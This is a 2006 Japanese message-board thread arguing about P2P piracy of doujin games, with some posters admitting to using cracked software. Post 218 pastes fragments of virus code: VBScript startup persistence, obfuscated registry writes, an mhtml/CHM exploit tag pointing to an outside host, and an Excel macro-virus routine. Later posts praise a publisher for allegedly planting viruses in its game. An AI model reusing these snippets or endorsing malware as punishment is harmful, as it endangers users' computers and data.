ま、こんなこと言っても、前スレの1は理解もしないんだろうけどさ

195 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 17:36:35 ID:HyhB8Cky
盗人猛々しいな

196 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 17:37:24 ID:brRblA+8
>193
やらなきゃいいだけの話。それで不正使用の理由にならん。

197 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 18:16:45 ID:HPvrWBKx
良かったものは買ってるってヤツよくいるけどさ、自分の心への免罪符にしようとしてるだけじゃん。
多くの金払わない作品への言い訳にすぎない。
P2P不正利用を正当化しようと試みてる根性が薄汚いわ。

198 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 18:24:13 ID:8lQ5yS61
別に正当化しようなんて思ってないがな。ゴミなんかに金を払いたくないだけw

199 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 18:25:13 ID:xpk8q8va
>>197
免罪符とは思ってないよ
ただでやって当然
面白ければ募金してあげるよ

ってこと
P2P正当化してる奴なんていないだろ

200 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 18:26:03 ID:eYtpFqUC
>>198
どうせゴミじゃないのにも金払わんのだろwwwww

201 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 18:42:24 ID:HPvrWBKx
>198-199
・ごみだから払わない
・面白ければ募金

自己行動の正当化してるじゃん。P2Pの法的正当化とかの話じゃないぞ?

202 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 18:45:22 ID:+mWIOUbX
誰も正当化はしてないだろ
悪い事はわかっててやってんの

203 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 21:23:33 ID:1N5WhwSZ
>同人はゴミだから金を出さない

前にも言ったがそういうヤシはフリーゲームやってれば良いじゃん。
それでも同人選ぶってのはそこにフリーにはない価値を見いだしているからだろ?

故に対価を支払うのは道理。

204 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 21:42:32 ID:pFU7u3TZ
対価はうp人が払ってくれました

205 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 23:13:25 ID:n76fjxjc
社会的に法的に悪い事は分かってるけど自分の中だけで通用する倫理観では
ゴミに値するものにお金を払わないのは当然だって、そう言うんだろ?
まさしくそれを正当化(せいとうか)っていうんだぜ。
これでひとつ賢くなったな。

206 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 23:52:30 ID:g4GTCd4U
正当化ってのは悪い事を悪くないって事にする行為のことだよ

207 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 00:01:32 ID:So5Bmg/L
ジョバンニが一晩でやってくれました。

208 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 00:44:10 ID:ls87ByZ/
ジョンバニの作業が一晩だろうと関係無い
敗因はマヌケな勝利宣言に尽きる
これはキラ負けで終わらなければならないのに
収集付かなくなった作者の都合によるもの
どんなにキレるあの男手さえ神である原作者の手にかかれば
ありえない発言や行動も思いのまま
そんな全知全能のほったつぐみが勝者
銃刀法違反で逮捕された小畑健が敗者


209 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 00:54:21 ID:Tk8jB5IS
どっちも雲の上です

210 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 02:02:54 ID:yquxOsdp
>>194
> 2000円以上出して5分でアンインスコしたゲームも少なくないから
> CG集なんか、PSDで膨らませているけれど20枚以下で2500円とかいうぼったくりもあるし
> しかもポーズがどこかで見たようなのが多かったり・・・・・

何年か前、自分もそういうのをいくつか掴んだことがあった。
金額的な被害はそう大きくはなかったが、あまりにクオリティが低くて
「こんなのをオレは買っちまったのかー」という自己嫌悪的精神ダメージのほうがでかかった。
あれが尾を引いて、しばらくは同人ソフト・CG集と聞いただけでクソくらえと思ってた。

でも最近はちゃんとしたところは体験版出してくれるから有難いわ。

211 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 02:20:00 ID:hOxdk8a9
なんか原作者がヒカルの碁と混ざってしまった
書いてて違和感あった

212 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 16:42:24 ID:Tk8jB5IS
ほったつぐみw

213 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 17:32:59 ID:p6J0PzCh
>>198
ゴミを漁ってるおまえはまさしく乞食そのものだなw

214 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 18:03:58 ID:Nz3YMqrn
ま、どんなゴミでも暇つぶしにはなるからなーw

215 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 18:06:04 ID:SH4rRGSZ
なら普通にゴミ箱あさってろよw

216 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/13(月) 18:26:19 ID:Tk8jB5IS
満場一致

217 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/14(火) 22:07:39 ID:+ajowG2F
商業ソフトがとまんないのに
同人止めれる訳がない

218 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/14(火) 22:24:40 ID:HCdZwDSU
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???????

219 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/14(火) 23:27:56 ID:9il078FE
奇麗事では回らないのが世の中だから

220 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/14(火) 23:48:16 ID:uMWTTGjw
なぁ、教えてくれ。
このスレに変なスクリプト投下するのはdown厨のいやがらせ?
それともnyに流される同人メーカーの嫌がらせ?

221 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/14(火) 23:49:26 ID:K7veXYau
スクリプトじゃねえし
嫌がらせする理由がないし

222 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 00:02:36 ID:XvNmsK4T
変なスクリプトってどれ?

223 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 00:04:55 ID:4mY7yDna
>>222

>>218とか>>165

224 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 00:32:26 ID:qAxDXqBg
とりあえず、ここにいるような連中なんかにどうこう出来る問題じゃないな
知恵も知識も技術も何にもなさそうだからなー。発現見ると頭悪すぎ

225 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 00:57:22 ID:XvNmsK4T
既にNG設定されてたから気付かなかった
これっていろんな所で見かけるある意味定番のコピペじゃん
何スレも行ってる長寿スレのテンプレによく貼られてる

226 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 03:45:56 ID:eMxpeScq
スクリプト(笑)

227 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 04:52:54 ID:l/88calA
マクロウイルスのコードだろうから、一応スクリプトではあるだろう。

>>221
嫌がらせなんて、単なる愉快犯ということで十分理由になるだろう。

228 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 06:57:41 ID:70+Ndesr
>224
お前の「発言」を見れば、お前の知恵が高くないことはすぐにわかる罠

229 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 21:08:03 ID:xYyIxWD2
発現(笑)

230 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 23:15:22 ID:uGydW2c9
で、あんたたちの持ってるPHOTOSHOPは正規版かね?w

231 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 23:19:15 ID:vo9lz6Ch
>>230
ちゃんと秋葉原の路上でおじさんから買ったよ。

232 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/15(水) 23:53:05 ID:FxFhDMBD
>>230
あー、言っちゃいけないことを…
昔某外周常連サークルの非公開IRCチャンネルで同じ話題が出た時、正規品だったのは9/23だったよw
さすがに商業でよく仕事してる人や、コミケの度に諭吉3桁扱うような人はちゃんと正規品使ってた。

233 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 00:12:08 ID:RIo++DPY
正規品のみ。

小銭ケチって法的リスク背負う奴アホ。

234 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 00:24:24 ID:s3tMuLj9
俺は出世払い

235 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 00:31:04 ID:mXMicqDa
そのアホの方が世の中多い。

クオリティにそこそこ自信持ってればP2P如きに必死にならなくてもいいが、
それでも修正ファイルのDL数がプレスした枚数の3倍届くとなんだかなー、とちょっと思う。
5桁もプレスしてねーw
あと再現できないローカルバグが本当に困る。

236 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 00:31:23 ID:4sVzQSTL
コピーに決まってんじゃんwwwwwwwwwwwwwwwwwwwwwwwww

237 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 00:42:19 ID:vkDPvKaH
> そのアホの方が世の中多い。
アホは臆面もなく違法行為を吹聴するから多く見えがちだけど、
正規品を使ってる人間や、そもそもフリーソフトでやってる人間の
ほとんどはとくにそれをアピールすることはないから、いくらなんでも
アホの方が多いってことはないと思う。

ただ、アホかどうかと作品の質は関係ないような気はする。
>232の話を聞いた後では特にそう思った。(話が本当かどうかは
確認しようがないんだけど、「あーありえるよねー」と思ってしまった)

238 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 00:50:40 ID:xSYscOe+
絵師はほとんど外注なんでそ?


239 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 00:54:25 ID:RIo++DPY
悪い事してる奴の典型的な自己弁護の台詞、
「みんなやってる」

無論、社会では通用しません。

240 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 02:43:56 ID:V2DC4mPc
Elementsじゃダメなの?
そもそもCG集じゃあるまいし同人ゲームに
PHOTOSHOP必須じゃないだろ
それとも同人ゲームって一般的には
エロゲみたいな紙芝居のゲームもどきの事なの?

241 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 03:14:59 ID:s3tMuLj9
>>240
紙芝居じゃなければゲームなの?

242 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 04:25:45 ID:/QudnJW+
>>239
全くだ。
他人の考えたキャラにえちい事させて売り上げとやらを出しおって。

243 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 06:26:31 ID:CojoOyJ8
話題をそらしてんじゃねえよボケども

244 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 07:04:24 ID:QFFDn3DO
「えちい」みたいな言い方がキモイな。
セックスしたこと無いんだろうな。

245 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 07:10:43 ID:RMdAbKtO
>>233
数百万分の製品落としたにしては
法的リスクが小指で持てるほど軽いぜ

246 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 10:00:58 ID:xkj+lxCh
否定派と適当に改変よろ

コピー肯定派
 ├─犯罪とわかってやってますが、なにか?
 │ ├─みんなやってるし
 │ ├─捕まえられるもんなら、やってみろ
 │ └─対価はうp人が払ってくれました
 ├─デメリットばかりではないよ
 │ ├─知名度が上がるメリットも
 │ └─クラック版の方が遊びやすいし
 ├─どうでもいいよ
 │ ├─面白ければ買うだけ
 │ └─買わないし、やらないし
コピー容認派
 ├─現状を認識しろ
 │ ├─プロテクトしても無駄、諦めれ
 │ ├─P2P撲滅は偉い人に任せればいいと思うよ
 │ ├─さほど影響ないから気にするな
 │ ├─中古市場は?
 │ ├─どうせすぐ破られてトラブルの原因になるだけ
 │ └─むしろクラックするまでがゲームですが?
 ├─同人は儲けるな
 │ ├─二次創作で儲けようとしてんじゃねえぞ
 │ ├─対価を払いたくなるものを造れ
 │ ├─あんたたちの持ってるPHOTOSHOPは正規版かね?w
 │ └─全部フリーにすれば?
コピー否定派
 ├─違法だよ
 │ ├─犯罪はダメ!絶対!

247 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 10:10:10 ID:7in2MkRB
同人って自分で買ってサークル支える事こそが、マイナーなブームに参加してる感じで、
楽しいんじゃないの?
P2P使ってまで同人ゲーをやりたがるのがよーわからん。
そういう奴は、同人の世界を理解してない気がするな。


248 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 10:21:00 ID:802oIDss
・同人の世界とかどうでもいい、ただの暇つぶし
・同人の世界とかどうでもいい、ただのオカズ探し
・巷で話題の作品を読めれば/プレイ出来ればそれでいい
・本来有料のものをタダで手に入れることに悦びを感じる

249 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 10:25:10 ID:7in2MkRB
なんか、すげークズだなあ・・・バイトすらしてねーから、そういう考えに染まるんだよ。


250 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 10:43:08 ID:802oIDss
手元に小金があったとしても、
さして好きでもないもの、大した労力もなくタダで手に入るものにカネは払わんよ

作品に対価を払ってサークルを支援してやることが同人の楽しみ方だと思うなら、
割れ厨のことなんか放っておきなよ
「同人のホントの楽しみ方も知らんのか、もったいねーなぁ」ってな感じでニヤニヤしてればいいじゃないの
目障りではあっても害を与える存在ではないんだし

害を与えてるのは、夏冬のイベントに欠かさず参加し、各サークルを巡って数万単位でお布施をし、
キミの基準で言えば同人の楽しみ方を極めてよく知っているはずの「ネ申」、すなわち一次放流者なのよね

251 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 11:12:40 ID:M1sZe25w
てかたかだか同人ゲームのことくらいでウィルスながすとかアホやな
しかもそれが悪くないみたいに思ってるとこもアホやな



252 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 11:41:31 ID:7in2MkRB
>>250
じゅうぶん害だろ、ウンコw

253 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 11:48:12 ID:802oIDss
ウンコは臭いってわかってんだから、それが苦痛ならわざわざ匂い嗅ぎに行くなよw

254 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 15:39:05 ID:vkDPvKaH
同人って、つまり同好の人が集まって
自主制作品を作ったり見てもらったりして
そんで話をしたりして楽しむことなんだよな。

で、同好の士でもない奴がP2P経由で作品をつまみ食いして
ネット上なりなんなりの話題に参加しようとするのは、異常者
レベルで空気読めてない無粋なことだから、キモがられ非難
されるわけだ。(話題に参加というのは当然、ROM行為も含む)

そういう無粋な奴と関わりを持たないようにわざわざ一般流通とちがって
特殊な配布経路になってるところを、P2Pという裏口から侵入した人間が
何かしら関わりを持っていることは、耳元を飛び回るハエ並にうざいわけだ。

昔のようにアングラと表とに深い隔絶があれば、そんなこともないんだろうな。
「ダウソ厨は生理的にキモい」というのは、そういう現状によるものだろう。
つまり、TouTubeみたいに堂々と表にでてくるアホを厳しく追い返すことが
地味だが大事だと言うわけだ。2chもアングラじゃないから、ここでも違法行為は
叩くに限る。

255 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 15:45:52 ID:VmoRjScz
よく分らんがダウソ民同士がnybbsやらでコミュ形成すればいいってこと?

256 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 16:05:35 ID:vkDPvKaH
じゃなくて、現状はそういうダウソ厨が目に付くけど、
ダウソ厨を探しても容易には見つけられない状態に
なれば、対立は起きないだろう、ということ。

つまり、「ばれなきゃいい」というならそれを徹底しろということ。
警察や力の大きい権利者に個々の不法行為が告訴されてなくとも、
一般人や泣き寝入りするような権利者の視界に留まる程度の
隠れ具合じゃぜんぜん足りん、ということ。

257 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 16:15:49 ID:XqpXezpI
つまり目障りだから消えてくれって事ね

258 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 17:17:22 ID:5qQXf4QH
>そういう無粋な奴と関わりを持たないようにわざわざ一般流通とちがって
>特殊な配布経路になってるところを

これは一般流通に乗せられないだけだろうが。わざわざなんて誰もやってないw

259 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 17:28:13 ID:N/8U/8ss
>じゃなくて、現状はそういうダウソ厨が目に付くけど、
>ダウソ厨を探しても容易には見つけられない状態に
>なれば、対立は起きないだろう、ということ。

ダウソ民同士がnybbsやらでコミュ形成すればいいってことだろ

260 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 17:54:51 ID:dYYVeLKq
ダウソ板でタダで入手したのに限って声が大きかったりするんだよな

261 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 18:11:51 ID:4sVzQSTL
で、対策の話はどこ行った?

262 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 18:12:23 ID:vkDPvKaH
>>258
企業化するとかして一般流通に乗せずとも、
ネット上でフリー配布したりもできるよな。
数だけ考えりゃフリーで配布すればいい。
金儲けを追求するなら起業すればいい。

どっちつかずの同好の士にとどまる程度のことだから、
わざわざ広い範囲に配布することなんて目指さず、
狭い範囲での活動になるんだよ。
だからわざわざ多量配布されるような真似は誰もやってない
(ゆえに、有料物をP2P経由で入手されるのがうざいわけだな)。

>>259
ny自体が表に露出しすぎてる現状でそれやるだけじゃ不足だってば。

263 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 18:41:40 ID:2LAs9zpo
相変わらず、飽きもしないで中身のない議論をよく続けてるなw

264 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 19:11:10 ID:HNoj9hVR
供託販売してる時点で狭い範囲とはいえないな
ゲームじゃなくて同人誌の話になるけど
イベント限定だと流れてないってのは意外にある

同人ゲームでイベントのみってあまり聞いた事無い
むしろイベント限定どころかDL販売用なんてのが結構あるが
これは同好の士っていえるのか
起業してなくともあきらかな商売だと思うんだが
どっちつかずの同好の士なんて皆無じゃないのか

265 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 20:59:04 ID:s3tMuLj9
委託販売は流通に載せてるんだから商業の媒体といえる

266 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 21:39:57 ID:ie5vgjlg
>>262
>ny自体が表に露出しすぎてる現状でそれやるだけじゃ不足だってば。
表に出たせいで入ってきたウマシカを一掃するいい方法がある。
大手新聞の一面&NHK&全民法のニュースでP2Pに出回ってるウィルスには亜種が多すぎてアンチウィルスソフトが効かないと告知するw
これをすれば暴露系に引っかかって情報流出させる馬鹿も減るし、お気軽な気持ちでP2Pやってる連中は相当数減るはず。
アンチウィルスソフトの会社に営業妨害だと言われそうだがwwww
これはネット上の一部の記事や、掲示板では周知の事実だけど表で言ってるのを見たことない。
ヘビーな連中には効かないが、もし実行できたらライトユーザーには即効性が見込める。

うちの連中はP2Pで出回るのは宣伝にもなるし専業同人でもないので余り気にしてないが、気にしてる人が多いのはこのスレ見れば分かる。
やっぱり必死になる人は稼ぎ全てを同人に頼っているので必死にならないと生きていけないのか?

267 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 21:49:39 ID:cLefdcE8
そんな告知程度で怖れてやら無いような人種はポート解放とかその類すらできんだろ
同人ゲームが主に流出するのはポート設定必須のshareだし
まあその後でそれがwinnyや海外のtorrentサイトに流れたりするんだが

そもそもアレだけニュースで情報流出やってるんだからアンチウイルスがどうこう言う以前に
そんなライトユーザーはニュース見た時点で止めるよ
政府が危険だから使わないようにしましょうとまでいったwinnyだが
現状はご存知の通り

268 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 21:51:59 ID:wecJRVSQ
>>266
気にしてないならわざわざ長文書いて語るなよw

269 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/16(木) 21:53:14 ID:DVdUc1co
>>266
金子逮捕時にやっただろ

270 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/17(金) 00:24:09 ID:vDsT2XNY
>>266
> やっぱり必死になる人は稼ぎ全てを同人に頼っているので必死にならないと生きていけないのか?
 「気にしてる人」
  ↓
 「必死になる人」
お前は気にしてる人の話をしてるのか、存在するかも怪しいP2P対策に
必死の覚悟で望む人間の話をしてるのか。

271 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/19(日) 14:47:17 ID:2Ci9w/wB
あらゆるエネルギーを吸収してしまい、攻撃が通じない敵って居るじゃん。
だけどエネルギーを与え続ける、というおきまりのパターンで簡単に死ぬ。

つまりだ。
拡散を防止するんではなく、積極的にダウンロードするんだよ。
放流主のトラフィックを増大させて規制、解約に追い込むんだ。

272 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/19(日) 15:02:59 ID:9DXH8HX1
ドラゴンボールでいたねそういうの
バビディのところで
メタルクウラもそうだった

273 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/19(日) 17:26:08 ID:WVmH7r9r
現実とアニメの区別ぐらい付けろ

274 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/20(月) 01:13:03 ID:dZl1XWja
きめえwwwwwwww

275 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/20(月) 05:22:02 ID:3fp8t/Fy
こんな彼だけど家では暴力振るってます

276 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/20(月) 09:12:42 ID:6j5K/IPE
まだあったんだねこのスレ

277 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/20(月) 10:16:04 ID:9145MD/h
実際、規制喰らって解約させられたヤシ居るみたいだよ
Shareだが。


[18禁ゲーム] [061117] 輸入について.txt 俺はロリコンxeXeC7bky0 170 b236c6d9e12d3c719830fcfca4606b235c27cacf 

何か規制されて強制解約されちゃいました。
今、代わりの制限付のISPだけど、アップできないので申し訳ないが、代わりのいいISPに変更するまで他の方に頼ってください。
すまんのぉ

278 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/20(月) 13:27:05 ID:l9UxD+AC
>>277
お前がShareの仕組みを理解してないのはよく分かった。
そんな事書いちゃうからダウソ板に馬鹿にされるんだよ、姿慎めよ

279 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/21(火) 06:05:37 ID:1XgBZUUu
必死さは伝わった

かわいい

280 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/21(火) 06:06:41 ID:1XgBZUUu
俺のID、実が出ちゃった屁みたいだと思った

281 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/23(木) 15:22:28 ID:In3beS9H
この糞スレもようやく終わりそうだな

282 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/25(土) 11:14:31 ID:u++WQyoX
ダウン厨の分際で調子に乗るんじゃねえよ糞尿

283 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/25(土) 11:16:49 ID:exBJnsM2
以後書込み禁止

284 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/25(土) 11:21:15 ID:MyujPfZP
同人なのに法人化してるサークルってどう思います?

285 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/25(土) 19:25:36 ID:vtZx09N3
12月13日に金子の裁判の判決が出て、また世間で話題に上がり
スレも盛り上がるかもしれんから
それまで勉強しとけよ

286 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/26(日) 04:54:36 ID:cTeB+jo9
判決出ても論議は無駄
何も無くならんし何も変わらん
プロバイダ対策も御上からヤメろ言われたし

家庭全てのテレビと電波使えなくしろと言ってるのと同じ

バハハイ

287 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/26(日) 04:56:23 ID:eSxsHGB6
>>284
法人化なんてただの税金対策だろ
儲かってるんだなーとは思うが

288 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/26(日) 07:05:40 ID:V4rvZhZ+
P2P壊滅するかもしれないよ。よかったね。同時に同人業界も壊滅するが。
http://comic6.2ch.net/test/read.cgi/doujin/1164335736/

289 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/26(日) 13:34:06 ID:nCZtJH/V
>>286
あせるんじゃねえよ早漏w

290 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/26(日) 13:46:40 ID:dOCQj8Ae
>>289
別に焦ってないだろ。
焦ってないのに出ちゃうから早漏なんだ。

291 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/27(月) 18:53:50 ID:lNPrjDEC
お前ら、絶対にウイルス流すなよ!

ビショップ新作エロゲにウイルス混入!
http://tmp6.2ch.net/test/read.cgi/download/1164585488/

292 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/28(火) 12:00:16 ID:7KDbvvZ5
もうDAT落ちしたスレだが
【MX移行組】n y エロゲー総合スレ Part85【お断り】
http://tmp6.2ch.net/test/read.cgi/download/1156537101/l50
の320あたりから読むと、
プログラムソースを持ってる人間が仕込んだっぽい。
つまりビショップ社員の仕業。
ただ、もう何年前から言われてることなんで、今さらの話。

http://tmp6.2ch.net/test/read.cgi/download/1164585488/12
によるとビショップは「放課後」というソフトから
ウイルスを仕込み始めたらしいけど
正規ユーザーとしても思い当たる節がある。
その「放課後」からビショップはソフトにコピープロテクトを導入し出したんだよね。
CDのコピー対策と同時にny対策も開始したんでしょう。



293 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/28(火) 12:03:34 ID:7KDbvvZ5
ちなみに「PC-NEWS」という、いささか正確性に欠けるソースではあるんだけど、
前作に比べると「放課後」の売上はかなり増えてたはず。
ソフトの内容も良かったんだろうけど、対策も効果あったんでしょう。

ただ2ちゃんのビショップスレには社員レスがあってうんざり。
アイルの某幹部社員が自社スレに多数レスしてたことが流出してバレてしまったが、
ビショップ社員のレスも流出して欲しいね。



294 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/28(火) 17:15:54 ID:5eQhIPzd
やっぱウイルスが一番効果的だな。

295 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/28(火) 18:11:23 ID:OH5ofWXa
防犯について知りたければ泥棒に聞けという

296 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/28(火) 18:17:27 ID:ZR0yOFrU
警察の人に聞くのもいいと思うよ^^

297 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 00:50:00 ID:QwcG0vgu
ダウンロード住民も、ビショップ相手に何のアクションも起こせてないな。
やっぱりウイルスだな。

298 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 00:55:18 ID:aXu3kUAV
正規に買ってるユーザーには無害だし
無断コピーしようとする奴だけ被害を受けるわけだから
合理的な対策だな

299 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 12:07:26 ID:8ku0q/Bo
売上自体についてはny対策よりもCDのコピー対策のほうが効果的だったかもね。
以後、ビショップの中古ソフトが品薄になって中古価格も上がった。
ただ「放課後」の次の「特別病棟」は売上がやや下がってたかも。

対策以外の要素としては、
ビショップは「放課後」からCGサイズを800×600に改善した。
それ以前は640×480で見劣りしてた。
だから旧作のCGサイズを800×600に直して再販したりもしてる。
あと「放課後」の発売時から登録ユーザーに対して
新作宣伝のDMを送るようになったと思う。
ビショップのチラシは非常にエロいから、DMは効果的かも知れん。

>>298
正規に買ってるユーザーにはnyのウイルスは関係ないが、
コピープロテクトとかディスクレスプレイ不可がウザイよ。
nyでプロテクトを外されたソフトが流れてるんなら
nyユーザーの方が快適にプレイできる。

300 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 13:20:44 ID:+yv1x5gn
>nyユーザーの方が快適にプレイできる。
っていうか、これは発売した会社がプロテクト誤爆に対応する速度が遅いのが原因。
PCゲーム業界なんて社員数が少ないので仕方ないが。
手の込んだプロテクトを施すほど、それに対する正規ユーザーへのサポートも面倒になるのは当然の話。

301 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 13:26:16 ID:X3sO9P7k
>>300
誤爆しなくてもうざいんだよ

302 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 15:32:42 ID:nLm3qezT
データはハードディスクにあるのにCD入れなきゃいけないとかね

303 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 16:12:55 ID:2e+MjRyd
デーモン

304 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 17:17:57 ID:0SmZikgX
今時DAEMON知らないって・・・

305 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 17:26:10 ID:aWSAmGl2
イメージ化も面倒くさいってことだろ。

306 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/29(水) 17:28:12 ID:ARmhymJc
プロテクト掛かってると吸い出し面倒だし
フルインスコにしか対応してないと
単純に倍の容量が必要になるわけで…

つか、マウンコするのが一番マンドクサい('A`)

